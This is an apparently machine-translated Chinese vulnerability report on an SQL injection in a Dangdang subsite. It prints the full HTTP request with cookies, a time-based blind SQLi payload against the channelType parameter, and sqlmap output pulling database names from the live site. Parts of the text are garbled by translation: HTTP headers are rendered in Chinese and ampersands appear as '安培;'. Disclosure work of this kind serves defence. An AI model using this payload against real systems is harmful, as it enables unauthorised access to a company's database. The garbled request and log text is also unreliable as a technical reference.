漏洞标题 当当网分站存在SQL注入 相关厂商 当当网 漏洞作者 Vinc 提交时间 2016-04-25 09:38 公开时间 2016-06-09 11:50 漏洞类型 SQL注射漏洞 危害等级 高…
漏洞标题
当当变电站有SQL注入
相关制造商
当当网
漏洞作者
时Vinc
提交时间
2016-04-25 09: 38
公共时间
2016-06-09 11: 50
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
15
漏洞状态
制造商已确认
标签标签
Sql注入
漏洞详细信息
GET包如下:
GET /media/api.go?action=mediaRankingList&listType=sale&channelType=*&permanentId=20151109120332208112113523718686951&returnType=json&channelId=70000&clientVersionNo=5.0.0&deviceType=DDDS_ALL&start=0&end=19 HTTP/1.1
接受: */*
Referer:http://e.dangdang.com/rank_detail_page.html
X-Requested-With: XMLHttpRequest
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21
Cookie: __permanent_id=20160423211433821241934195768855298; ddscreen=1; MDD_channelId=70000; MDD_fromPlatform=307; dest_area=COUNTRY_ID%3D9000%26province_id%3D173%26city_id%20%3D0%26district_id%3D0%26town_id%3D0
连接:保持活动状态
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,en,*
主机: e.dangdang.com
Pragma:无缓存
缓存控制:无缓存
参数:channelType
漏洞证明:
Sqlmap从存储的会话:恢复以下注入点
---
参数:#1 *(URI)
输入:和/或基于时间的盲
标题: MySQL>=5.0.12 AND基于时间的盲(SELECT)
有效载荷:http://e.dangdang.com: 80/media/api.go?action=mediaRankingList& list
Ype=sale& channelType='AND(SELECT * FROM(SELECT(SLEEP(5)))HUfh)AND'aSqF'='a
QF&安培; permanentId=20151109120332208112113523718686951&安培;返回类型=JSON&安培;的channelID=70
00安培; clientVersionNo=5.0.0&安培;设备类型=DDDS_ALL&安培;开始=0&安培;端=19
---
[09: 45: 07] [INFO]测试MySQL
您是否希望sqlmap尝试优化DBMS延迟响应的值(选项
'--time秒')? [Y/N]
[09: 45: 14] [INFO]确认MySQL
[09: 45: 14] [警告]不要强调网络适配器dur非常重要
从对等方接收数据时失败
[09: 47: 59] [ERROR]检测到无效字符。重试.
[09: 47: 59] [警告]将时间延迟增加到3秒
一个
[09: 48: 05] [INFO]检索到:数字
[09: 49: 55] [INFO]检索到:数字
[09: 51: 46] [ERROR]检测到无效字符。重试.
[09: 51: 46] [警告]将时间延迟增加到4秒
L_
[09: 53: 13] [ERROR]检测到无效字符。重试.
[09: 53: 13] [警告]将时间延迟增加到5秒
搜索
[09: 55: 21] [INFO]检索到: dpp
[09: 57: 30] [ERROR]检测到无效字符。重试.
从对等方接收数据时失败
-
发表于 2016-07-17 08:00
- 阅读 ( 571 )
- 分类:黑客技术